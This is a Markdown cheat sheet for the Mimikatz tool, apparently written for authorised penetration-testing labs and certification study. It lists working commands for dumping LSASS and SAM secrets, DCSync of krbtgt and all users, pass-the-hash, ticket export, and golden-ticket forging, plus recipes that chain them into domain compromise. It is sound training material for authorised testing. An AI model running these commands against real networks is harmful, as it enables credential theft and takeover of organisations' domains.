mimikatz.md (4913B)
1 --- 2 title: "Mimikatz" 3 description: "Mimikatz credential extraction: sekurlsa, LSA dumps, DCSync, pass-the-hash/ticket, golden/silver tickets." 4 category: active-directory 5 subcategory: "Tooling & Recon" 6 tags: [active-directory, credentials, kerberos] 7 tools: [Mimikatz] 8 difficulty: intermediate 9 updated: "2026-08-09" 10 source: "vault:Tools/Mimikatz-Cheatsheet.md" 11 --- 12 13 # Mimikatz 14 15 > **Context —** HTB / CPTS / authorised AD labs. Tool: Mimikatz (module reference). 16 17 Windows credential / Kerberos post-exploitation reference for authorised assessments. Commands track the upstream README and wiki. Prefer modern alternatives (`nxc … --sam/--lsa`, `secretsdump`, Rubeus) when EDR blocks Mimikatz — still learn the module language for older labs and reports. 18 19 Related notes: Rubeus, Impacket, NetExec, Hashcat, Certipy, Cobalt Strike. 20 21 ## Summary 22 23 Mimikatz reads Windows secrets from LSASS, SAM/LSA, and Kerberos, and can perform PtH/PtT and ticket forging. On modern hosts expect Credential Guard, LSA protection, and EDR to block naive runs. Use only with authorisation; treat dumps as highly sensitive evidence. 24 25 > **Danger — Authorised-use framing** 26 > 1. Requires appropriate privileges (often high integrity + `SeDebugPrivilege`). 27 > 2. LSASS access is loudly monitored — prefer lab-safe methods when possible. 28 > 3. Never run against production without explicit ROE. 29 30 ## Session Hygiene 31 32 ```text 33 mimikatz # log 34 mimikatz # privilege::debug 35 mimikatz # token::elevate # when needed 36 mimikatz # version 37 ``` 38 39 > **Important — Prerequisites** 40 > 1. `privilege::debug` should return OK before `sekurlsa::*`. 41 > 2. `log` writes a transcript — useful for reports. 42 > 3. Architecture must match (x64 mimikatz on x64 Windows). 43 44 ## sekurlsa (LSASS) 45 46 ```text 47 sekurlsa::logonpasswords 48 sekurlsa::tickets /export 49 sekurlsa::ekeys 50 sekurlsa::pth /user:Administrator /domain:DOMAIN /ntlm:NTHASH /run:cmd.exe 51 ``` 52 53 > **Module breakdown** 54 > 1. **logonpasswords**: MSV / TSPKG / WDigest / Kerberos material from logon sessions. 55 > 2. **tickets /export**: `.kirbi` files for Rubeus `ptt` or Mimikatz `kerberos::ptt`. 56 > 3. **pth**: spawn a process with alternate NTLM credentials (PTH). 57 > 4. WDigest cleartext appears only if WDigest is enabled (legacy configs). 58 59 ## lsadump / DCSync 60 61 ```text 62 lsadump::sam 63 lsadump::secrets 64 lsadump::lsa /patch 65 lsadump::dcsync /domain:DOMAIN.LOCAL /user:krbtgt 66 lsadump::dcsync /domain:DOMAIN.LOCAL /user:Administrator 67 lsadump::dcsync /domain:DOMAIN.LOCAL /all /csv 68 ``` 69 70 > **Warning — DCSync rights** 71 > 1. Needs replication rights (e.g. Domain Admins / equivalent ACLs) — map with BloodHound. 72 > 2. Prefer Impacket `secretsdump.py -just-dc-user` from Linux when you already have creds. 73 > 3. `/user:krbtgt` enables golden-ticket tradecraft — document carefully. 74 75 ## kerberos 76 77 ```text 78 kerberos::list /export 79 kerberos::ptt c:\temp\ticket.kirbi 80 kerberos::purge 81 kerberos::golden /user:Administrator /domain:domain.local \ 82 /sid:S-1-5-21-... /krbtgt:KRBTGT_NT_HASH /ptt 83 ``` 84 85 > **Tip —** Harvest/monitor/roast flows are often cleaner in Rubeus, but Mimikatz remains ubiquitous in writeups and older lab guides. 86 87 ## crypto / vault 88 89 ```text 90 crypto::capi 91 crypto::cng 92 crypto::certificates /export 93 crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE 94 crypto::keys /export 95 vault::cred 96 vault::list 97 ``` 98 99 ## Practical Recipes 100 101 ```text 102 # A) Local admin → LSASS → PTH 103 privilege::debug 104 sekurlsa::logonpasswords 105 sekurlsa::pth /user:Administrator /domain:CORP /ntlm:fc525c96... /run:powershell.exe 106 107 # B) DA → DCSync krbtgt → golden 108 lsadump::dcsync /domain:corp.local /user:krbtgt 109 kerberos::golden /user:EvilAdmin /domain:corp.local /sid:S-1-5-21-... \ 110 /krbtgt:HASH /ptt 111 112 # C) Export tickets for offline reuse 113 sekurlsa::tickets /export 114 ``` 115 116 ## Troubleshooting & Gotchas 117 118 > **Common failures** 119 > 1. **Privilege '20' KO**: not elevated / PPL blocking — try accepted lab bypasses only inside ROE. 120 > 2. **Empty passwords**: Credential Guard / no WDigest — collect NT hashes or tickets instead. 121 > 3. **AV deleted binary**: sideload from approved C2 toolkit or use non-Mimikatz dumpers in that lab. 122 123 ## Lessons Learned 124 125 1. `privilege::debug` + matching arch before anything else. 126 2. Export tickets early; sessions disappear on logoff. 127 3. DCSync > interactive LSASS on DCs when you already have replication rights. 128 4. Cross-tool fluency (Mimikatz ↔ Rubeus ↔ Impacket) matters more than one binary. 129 5. Treat outputs as credential inventory for the report, not a souvenir stash. 130 131 ## References 132 133 1. gentilkiwi/mimikatz: https://github.com/gentilkiwi/mimikatz 134 2. Mimikatz Wiki: https://github.com/gentilkiwi/mimikatz/wiki 135 3. gentilkiwi blog: https://blog.gentilkiwi.com/mimikatz 136 4. MITRE ATT&CK — OS Credential Dumping: https://attack.mitre.org/techniques/T1003/ 137 5. HackTricks — Mimikatz: https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz